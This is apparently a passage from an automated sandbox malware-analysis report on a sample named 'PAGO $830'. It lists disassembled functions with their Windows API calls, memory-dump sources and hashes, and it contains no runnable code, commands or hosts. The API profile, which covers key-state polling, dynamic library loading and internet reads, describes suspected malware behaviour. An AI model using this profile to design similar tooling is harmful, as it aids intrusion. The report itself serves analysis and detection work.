                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                          • String ID:
                                                          • API String ID: 826366716-0
                                                          • Opcode ID: ed5cb07c61fbf9c13ef8d33dc13a8006d93e65b63844b3c46418df6e9e9ea17b
                                                          • Instruction ID: 882471e7bb9ce610ccd337b9dcc989edfbf60a8bcdf8632c0cde4ea545f30414
                                                          • Opcode Fuzzy Hash: ed5cb07c61fbf9c13ef8d33dc13a8006d93e65b63844b3c46418df6e9e9ea17b
                                                          • Instruction Fuzzy Hash: 5B619C31208245AFC314DF24C490E2ABBE5FF84318F19C55EF5998B2A2DB71ED45CBA2
                                                          Function 00DD8B06 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00DD8B23
                                                          • VariantClear.OLEAUT32 ref: 00DD8B94
                                                          • VariantClear.OLEAUT32 ref: 00DD8BF3
                                                          • VariantClear.OLEAUT32(?), ref: 00DD8C66
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DD8C91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType
                                                          • String ID:
                                                          • API String ID: 4136290138-0
                                                          • Opcode ID: 25fb985cbd357e25de77651f2cbe5ff1df545838350023198f76b44bdf9a2a46
                                                          • Instruction ID: 13b3323bfa44188a4ac7c98511bfe7e3d04ec3bd9e37eb28184fc073dc0fccf0
                                                          • Opcode Fuzzy Hash: 25fb985cbd357e25de77651f2cbe5ff1df545838350023198f76b44bdf9a2a46
                                                          • Instruction Fuzzy Hash: 76516CB5A10219DFCB11CF69C894AAAB7F8FF89310B15856AE955DB310D730E911CBA0
                                                          Function 00DE8A19 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DE8ACC
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00DE8AF8
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DE8B50
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DE8B75
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DE8B7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String
                                                          • String ID:
                                                          • API String ID: 2832842796-0
                                                          • Opcode ID: 793b4354fdd5228d7576aac67b01e1e511f38db30a2950b8c897a4cae427fbea
                                                          • Instruction ID: c61a6af5e632b1532ad80bb8540eaada823997f4b5b820316d0b2573a45fc011
                                                          • Opcode Fuzzy Hash: 793b4354fdd5228d7576aac67b01e1e511f38db30a2950b8c897a4cae427fbea
                                                          • Instruction Fuzzy Hash: 42515A75A00614DFCB01EF65C885A6ABBF5FF48314F08C098E949AB362DB71EC41DBA1
                                                          Function 00DF8E0B Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00DF8E67
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00DF8EF7
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DF8F13
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00DF8F59
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00DF8F79
                                                            • Part of subcall function 00D8F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00DE0F61,?,7529E610), ref: 00D8F7C5
                                                            • Part of subcall function 00D8F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00DCF94D,00000000,00000000,?,?,00DE0F61,?,7529E610,?,00DCF94D), ref: 00D8F7EC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                          • String ID:
                                                          • API String ID: 666041331-0
                                                          • Opcode ID: 48455aaeb0d5f52900ce92329ede712b6a52c9ce31adda1bb7350d45e7837e8a
                                                          • Instruction ID: ffd075fe7e4dc7987ffc8cbd4071eff1128a9cc04e22310d75d98106a5578ac3
                                                          • Opcode Fuzzy Hash: 48455aaeb0d5f52900ce92329ede712b6a52c9ce31adda1bb7350d45e7837e8a
                                                          • Instruction Fuzzy Hash: ED515B35601209DFCB00DF54C4849A9BBF1FF49324B19C0A9F909AB362DB31ED85DBA1
                                                          Function 00E06A44 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E06B01
                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00E06B18
                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E06B41
                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00DEAA97,00000000,00000000), ref: 00E06B66
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E06B95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MessageSendShow
                                                          • String ID:
                                                          • API String ID: 3688381893-0
                                                          • Opcode ID: 84bfd941ca174455a39cf768ba39c6d618f546209d3321f46ec2c28f7498f15c
                                                          • Instruction ID: a41949b1b85c55de53d88d6aff0e3bc0358eed6a5789d0fc426c895f68bdd9ce
                                                          • Opcode Fuzzy Hash: 84bfd941ca174455a39cf768ba39c6d618f546209d3321f46ec2c28f7498f15c
                                                          • Instruction Fuzzy Hash: 2E41C179A00104AFDB249F68CC58FAA7BA5EB4A364F145224F915B72E0C771EDA1CA50
                                                          Function 00D8EA9A Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00D8EAAE
                                                          • ScreenToClient.USER32(?,?), ref: 00D8EACB
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00D8EB02
                                                          • GetAsyncKeyState.USER32(00000002), ref: 00D8EB1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 11889862e5e90d7840e16364c1912c22d373b72cd4ba00142d8bb99e73417b6e
                                                          • Instruction ID: d68d3ce4b5f186d90280d21803c6e5bc334b24348da248e26f46e56c716dac21
                                                          • Opcode Fuzzy Hash: 11889862e5e90d7840e16364c1912c22d373b72cd4ba00142d8bb99e73417b6e
                                                          • Instruction Fuzzy Hash: AF416D7160411AABDB159FA4C844FEEB7B4FF05324F244319E425A72D0C731A994CF61
                                                          Function 00DE3792 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetInputState.USER32 ref: 00DE37E9
                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DE3840
                                                          • TranslateMessage.USER32(?), ref: 00DE3869
                                                          • DispatchMessageW.USER32(?), ref: 00DE3873
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE3884
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                          • String ID:
                                                          • API String ID: 2256411358-0
                                                          • Opcode ID: f88c2a882b7937fe1235e2104a3cb694acb7e72be5f6abf9e02363b8adf35224
                                                          • Instruction ID: 6347c3b2d10fd14f99b9fe4504b2d5e1c4ba730e3302183fea459b3b8ed7eb8b
                                                          • Opcode Fuzzy Hash: f88c2a882b7937fe1235e2104a3cb694acb7e72be5f6abf9e02363b8adf35224
                                                          • Instruction Fuzzy Hash: FB31A3745043C19EEF28EB779C8DBB63BA8AB06304F1805ADE452D3090E7659AC9CB31
                                                          Function 00DECE38 Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00DEC13C,00000000), ref: 00DECE56
                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00DECE8D
                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,00DEC13C,00000000), ref: 00DECED2
                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DEC13C,00000000), ref: 00DECEE6
                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DEC13C,00000000), ref: 00DECF10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                          • String ID:
                                                          • API String ID: 3191363074-0
                                                          • Opcode ID: ec9938611e9bedc1049d9748a92dda094ec7ec081280060ce7b84da0fabb69b4
                                                          • Instruction ID: 68dae6fd79a695203afce17c896e7cea6e7effa401465f64eb25fc2f316c8c63
                                                          • Opcode Fuzzy Hash: ec9938611e9bedc1049d9748a92dda094ec7ec081280060ce7b84da0fabb69b4
                                                          • Instruction Fuzzy Hash: 5A316B72610245AFDB20EFA6C884AABBBF8EF14750B24442EF546E2141D730ED429B70
                                                          Function 00DD1845 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00DD1859
                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 00DD1905
                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 00DD190D
                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 00DD191E
                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DD1926
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: 5a58f896a117b2b0e1c6400d70985469bb0a8f5c694f1718a4615a36f51dba62
                                                          • Instruction ID: faf5a55f6e42077ecc1a171d2f3d70b5c033ec7e42f40f76df636ff7dbfe83fc
                                                          • Opcode Fuzzy Hash: 5a58f896a117b2b0e1c6400d70985469bb0a8f5c694f1718a4615a36f51dba62
                                                          • Instruction Fuzzy Hash: 3731DF75900219FFCB14CFA8DC89ADE3BB5EB04315F10432AF921AB2D0C370A954DBA0
                                                          Function 00E0563B Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E0567A
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E056D2
                                                          • _wcslen.LIBCMT ref: 00E056E4
                                                          • _wcslen.LIBCMT ref: 00E056EF
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E0574B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_wcslen
                                                          • String ID:
                                                          • API String ID: 763830540-0
                                                          • Opcode ID: e52c0520bf80e54e306581f50effd6b435b3eb65f76b4f99c24ee2f59339ed85
                                                          • Instruction ID: a1924879ad8b447090757f0298f89f8aaad6e336c73637bbab848181fcd0ca42
                                                          • Opcode Fuzzy Hash: e52c0520bf80e54e306581f50effd6b435b3eb65f76b4f99c24ee2f59339ed85
                                                          • Instruction Fuzzy Hash: 862193729006089ADB208F94DC44AEE7BB8FF04754F109266E919FA1C4D771D9C5CF60
                                                          Function 00DF0857 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 00DF0878
                                                          • GetForegroundWindow.USER32 ref: 00DF088F
                                                          • GetDC.USER32(00000000), ref: 00DF08CB
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00DF08D7
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00DF090F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: cb50a5b816671bf47a965c2b6911de44e417dfc9be9bc0693a4ae86b39b0429f
                                                          • Instruction ID: fac5804e20d90172f250342b6b43389542d83253b0e35c840ce399e0f62b724e
                                                          • Opcode Fuzzy Hash: cb50a5b816671bf47a965c2b6911de44e417dfc9be9bc0693a4ae86b39b0429f
                                                          • Instruction Fuzzy Hash: 8521A175600204AFD714EF6ADC84AAA7BF5FF48740B14C038F54AA7352DB31AC44CBA0
                                                          Function 00DACD5D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00DACD66
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DACD89
                                                            • Part of subcall function 00DA37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C,00E0D0D0,?,00DB242E), ref: 00DA37E2
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DACDAF
                                                          • _free.LIBCMT ref: 00DACDC2
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DACDD1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: 667ba873a9d5db9e91c2befc64c4a343639673a923eaa08ffce1f31dbca127b6
                                                          • Instruction ID: 3e1111363de190c28107ed61730f8a6b2dfc01ce63d92bced549886e5d88cfa9
                                                          • Opcode Fuzzy Hash: 667ba873a9d5db9e91c2befc64c4a343639673a923eaa08ffce1f31dbca127b6
                                                          • Instruction Fuzzy Hash: EB01B1736122157F6B211B7B5C88C7B6D6DDAC3B703281239B905E6200DA618C0181B0
                                                          Function 00D8AABF Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D8AB19
                                                          • SelectObject.GDI32(?,00000000), ref: 00D8AB28
                                                          • BeginPath.GDI32(?), ref: 00D8AB3F
                                                          • SelectObject.GDI32(?,00000000), ref: 00D8AB68
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 6bdbca2960b04e5be46d7c79cb151b75854fe5671803a3a2b0796d92bd94526b
                                                          • Instruction ID: 25b3429d3a4d960f84d099ed47855661f8ec9a7731bfcf4c1d22d962f6061b2c
                                                          • Opcode Fuzzy Hash: 6bdbca2960b04e5be46d7c79cb151b75854fe5671803a3a2b0796d92bd94526b
                                                          • Instruction Fuzzy Hash: 03218034802305EFEF11AF6AED14BA97BB5FB82351F144256F551B60A0D37098DACBA1
                                                          Function 00DD5667 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 53d75b53aaa94b01157eea90ca15df5111717dc5c17481f98ccdc30bf42e4415
                                                          • Instruction ID: dbd395c2ac844be317138cbb336520b2de2b8ff5e2e902b02930569af68e2d22
                                                          • Opcode Fuzzy Hash: 53d75b53aaa94b01157eea90ca15df5111717dc5c17481f98ccdc30bf42e4415
                                                          • Instruction Fuzzy Hash: 6001D876705A0A7BE714A610AC82FAB736CEF20398F544432FD05A6789EB51ED2086F5
                                                          Function 00DA2D88 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00D9F26E,00DA37F3,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C), ref: 00DA2D8D
                                                          • _free.LIBCMT ref: 00DA2DC2
                                                          • _free.LIBCMT ref: 00DA2DE9
                                                          • SetLastError.KERNEL32(00000000), ref: 00DA2DF6
                                                          • SetLastError.KERNEL32(00000000), ref: 00DA2DFF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: c72915bbe623d0b5ad1381a968135068adc270f82739f4f7738bfbfe719b6ba9
                                                          • Instruction ID: fb6e0d16abcc74e53f91eecbb52c292e5fbb3f7d025bb1a3777a907a80085361
                                                          • Opcode Fuzzy Hash: c72915bbe623d0b5ad1381a968135068adc270f82739f4f7738bfbfe719b6ba9
                                                          • Instruction Fuzzy Hash: A60128326426017BCA22273F6C8AD3B166EEBC3771B344524F419B2183EE34CC4A52B0
                                                          Function 00DDE899 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00DDE8B5
                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 00DDE8C3
                                                          • Sleep.KERNEL32(00000000), ref: 00DDE8CB
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00DDE8D5
                                                          • Sleep.KERNEL32 ref: 00DDE911
                                                          Memory Dump Source
